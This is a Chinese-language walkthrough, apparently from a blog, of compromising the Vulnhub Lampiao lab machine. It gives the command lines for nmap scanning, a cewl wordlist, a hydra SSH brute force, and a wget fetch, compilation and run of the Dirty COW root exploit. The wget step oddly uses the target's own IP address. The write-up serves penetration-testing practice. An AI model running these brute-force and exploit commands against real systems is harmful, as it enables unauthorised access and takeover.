分类:Web渗透 2026 年 5 月 25 日

Vulnhub靶场之Lampiao

Lampiao靶机;Vulnhub
Vulnhub靶场之Lampiao相关内容

下载地址

image-20260525083323240

操作环境

攻击机:kali2026.1

image-20260512155905342

虚拟网卡

VMnet19:192.168.19.0/24

靶机渗透

主机探测

arp-scan -l

image-20260525083626327

靶机ip为192.168.19.136

端口探测

nmap -p- 192.168.19.136

image-20260525083712133

开放了80端口,在浏览器中访问一下

端口访问

image-20260525083748715

80端口没有发现什么异常,访问1898端口

image-20260525083940397

是一个cms系统的登录页,点击readmore发现url发生了变化

image-20260525084128244

将node/1改为2,3都会发生变化

在node/2页发现了两个文件

image-20260525084303575

在audio.m4a中提到了一个用户, user:tiago

image-20260525084547042

node/3也发现了一个文件

image-20260525084346561

访问一下robots.txt,发现一堆目录

image-20260525084721553

查看一下changlog.txt,使用的是Drupal 7.54版本的cms

image-20260525085424895

查询一下漏洞攻击脚本

searchsploit Drupal 7.54

image-20260525085641097

漏洞利用

在这里我们先使用cewl来生成一份结合网站目标的社工性质的密码字典

cewl http://192.168.19.136:1898 -w /root/Desktop/pass.txt

image-20260525085917164

使用hydra进行密码爆破

hydra -l tiago -P /root/Desktop/pass.txt 192.168.19.136 ssh

image-20260525090314998

得到用户名和密码tiago/Virgulino

image-20260525090634955

使用ssh远程登录,成功getshell

image-20260525091013834

提权

经过查询,发现这个dirty(脏牛)可以进行提权,于是我们在kali中查询是否存在这个exp

searchsploit 40847

image-20260525091244936

将exp上传到攻击机web目录中

cp /usr/share/exploitdb/exploits/linux/local/40847.cpp /var/www/html/1.cpp

image-20260525091713883

启动apache,使用wget将exp上传到靶机中

systemctl start apache2

image-20260525091815802

使用wget下载exp

wget http://192.168.19.136/1.cpp

image-20260525092135447

编译源码,并执行

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 1 1.cpp -lutil

成功获取root密码

image-20260525092325370

使用su成功切换到root用户

image-20260525092400378

获取flag

image-20260525092901799

文章评论